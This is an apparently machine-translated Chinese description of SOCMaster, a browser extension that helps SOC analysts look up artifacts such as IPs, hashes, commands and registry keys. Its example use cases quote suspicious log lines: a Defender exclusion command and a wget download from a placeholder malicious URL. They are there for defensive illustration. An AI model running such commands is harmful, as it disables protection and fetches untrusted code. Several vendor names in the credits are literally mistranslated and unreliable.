SOCMaster

一键获取有关操作系统命令、IP、域、URL、哈希、Windows 事件和注册表项、字符串和文件的信息。

浏览器内威胁情报伴侣，通过跨领先安全供应商的一键查找来简化工件分析（IP、域、URL 等）。

SOCMaster 与 VirusTotal、AbuseIPDB 等领先的威胁情报平台集成，使用户能够快速将数据转化为可操作的见解。

================================
用法
================================
单次查找

1. 在 Web 浏览器中，选择或突出显示一个工件并右键单击

2. 选择“SOCMaster”

3. 单击可用选项之一

4. 菜单将出现在右下角，其中包含有关工件的信息

批量查找——允许您一次快速评估多个工件，从而在深入调查期间节省时间。

1. 从 Web 浏览器收集 IP 地址、域、URL、文件哈希值、文件名的列表。每个条目由换行符或空格分隔

例如：

8.8.8.8
7.7.7.7
6.6.6.6

2. 突出显示所有要扫描的对象，右键单击，然后选择“SOCMaster”

3. 单击可用选项之一（使用供应商 API 密钥进行 IP/域/URL/哈希扫描或获取文件 (Linux/Windows) 信息）

4. 右下角将出现菜单，其中包含每个对象的信息。来自威胁英特尔供应商的工件的声誉也将显示。

===============================
主要特点
===============================

1. 使用供应商 API 密钥的 IP/域/哈希：

- 使用 AbuseIPDB、VirusTotal、AlienVaultOTX、HybridAnalysis 等威胁情报供应商来获取有关 IP 地址、域、哈希的声誉和信息。可用数据取决于供应商。

- 需要供应商提供 API 密钥。

2. 使用供应商 API 密钥进行 URL 扫描：

- 将 URL 提交到 URLscan.io、VirusTotal、AlienVault、HybridAnalysis 等，以便使用 API 密钥进行分析。

- 单击供应商链接可查看 URL 扫描结果。

- 需要供应商提供 API 密钥。

3. 获取操作系统命令信息（PowerShell、Windows、Linux OSX）：

- 从 Powershell 模块获取有关 3,300 多个 Powershell cmdlet、几乎所有 Linux 命令（手册第 1-8 节）、Windows 命令和 OSX 命令的信息。

- 显示有关操作系统二进制文件和命令的信息。例如，Windows 命令“ipconfig”或“tasklist”、Powershell 的“Set-ExecutionPolicy”以及 Linux 的“rm”。

- 无需 API 密钥

4. 获取文件（Linux/Windows）或注册表项（Windows）信息：

- 检索已知文件的信息，例如 Windows 的“kernel32.dll”或 Linux 的“passwd”。

- 获取有关 Windows 注册表项的信息，例如“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce”。
- 无需 API 密钥

5. 获取事件ID信息（Windows）：

- 使用事件 ID 显示有关 Windows 事件日志的文档
- 无需 API 密钥

6. 字符串搜索（Twitter、Google）：

- 使用字符串显示 Twitter 或 Google 搜索结果

================================
API密钥配置
================================

要使用供应商 API 密钥查询 IP、域和哈希，需要 API 密钥。请按照以下步骤操作：

1. 单击 Google Chrome 右上角菜单中的扩展程序图标

2. 点击“SOCMaster”图标 > 设置

3.在设置页面右上角点击“添加API密钥”

4. 在英特尔源选择上，选择 API 密钥供应商

5. 将供应商 API 密钥粘贴到 API 密钥字段中

6.点击保存

7.现在添加了API密钥，现在可以使用使用供应商API密钥的IP/域/哈希扫描

================================
示例用例
================================

1. 可疑的PowerShell日志显示：
Set-MpPreference -ExclusionPath "C:\users\public\documents\sucmra"

用户可以突出显示上述命令并选择“查找命令信息”选项，并且将能够查看该命令的语法和参数。

2. 防火墙日志中的可疑IP地址：
xxxx

用户可以突出显示 IP 并选择“使用供应商 API 密钥进行 IP 扫描”选项，并且能够查看来自供应商的 IP 信誉和数据。

3.可疑的linux命令显示：
wget http://malicious_url -O

用户可以突出显示上述命令并选择“查找命令信息”选项，并且将能够查看该命令的语法和参数。

4. SIEM 上的 Windows 事件 ID 显示：
事件ID 4624

用户可以突出显示事件 ID 号并选择“获取事件 ID 信息”选项，然后将能够查看 Windows 事件的字段和描述

================================
学分
================================

支持以下供应商：
病毒总数
滥用IPDB
AlienVaultOTX
叽叽喳喳
网址扫描
混合分析
谷歌搜索
脉冲潜水

作者联系方式：https://www.linkedin.com/in/marcusmcapistrano/